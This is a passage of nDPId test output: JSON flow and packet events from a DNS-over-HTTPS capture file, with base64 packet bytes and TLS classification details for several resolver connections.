{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="}
00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaNNWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmnMdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"}
00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jdG+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zNuwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1CaH7DzSlA01ud99lTK4rI7nRSGX9tAnrwTrORIzDrntkMH1VggJmMFY3EGxAMzh1CUd24C\/NVxnQ9P5qmX0Sgg6uSgxO2c7COAq2edHC\/ucd7dmb9rLGiOGU7YGRxfXuPTU+xfVNmV8wvcxQY9WY3QcHJbT2Vz2Hldj+q9L+347LUl4d5nRCyZOpijGWSFFM5lFqup\/GoObWXXvMsTO9NawTXovnf4MnjeZczPg2FrW3tlX0uBW7P24cE4VNHjvnvHknCsLft2dOFPhwAUA7qVOuJixr0stgCN8eCmK\/n1WzppsTm55hMBmYIkE9rYwxrxXiN39LFT+j0SlpiMqf5n1b7aJjSjiQjm1\/T42XF5prhRwaxJyOBzS5a2w2BxZDhOvMuBRY6ZtDe+ptzu07\/eUIO\/cQq36LXuMCRYTHNEIXnWWtA0vjAcmq+EwSCLEygFwVxoPgN5h2qTp7SdJVushbBgsziLiKFyhenEAkjP4tYMg82sWXtGvK2T4GbMrKF+OJsVll7gTGHENl+vuBtGryghKs2kRZov918dT+VWdywju+ew9zl+S0NiyZlvWu+CmHSGFpvtCqWMXNaXEERtmXJVFofSJ7ykCfNo49lq+tJOi\/mrPExexfpWVgisqVMvGukP+ZkhcE5Ck47mFMZqfJTRL364HqGaNbc7EKIab24NToEVrdLyvx+sQZXNXCyXhOVxnIWFgUdF0PMAFDvMwWrgJTufvZcx1q\/rK6GjKie1KAVcLQPkAeyb2aBh0GehIKRHB5OLWsjRXWSnC7RfnFW6K8cokr6NiSGrPTHJtZfW+014hI265qPA0R6qLZ3SkGPsU2l+ULOh8f4TsNZmRbk\/UzcCp9zJB2\/sAwMANTEmXxPw2yMWVIdXVMdzqrOV"}
00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739402059,"flow_last_seen":946739402097,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739402097,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02345{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":946739402097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAWWZpJAADcGH\/ou48g2CgAAAQG73uK776KtxxCRm1AYAfUU3AAACNSc59sPW4OZKm6qSD7jsBvdulSTgK8LagzUdpT43FqU1TjbgFd6vr1YcfE0NFplErjVqY14Uy0e6vIiPxevgsH6OdIHZm6pvnG3NGQZr+Eawc3lwPRCg\/OYwfYOVATUQ+D48eMINi076ymhr9WarR1T\/muiarwvLXYV6Uhar7rOYnX1fnOldHU7V9Vf3n22jVlaRu9FvfUlIGCuR9DlhblioT6Pi7Xq+9B1pOrzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkC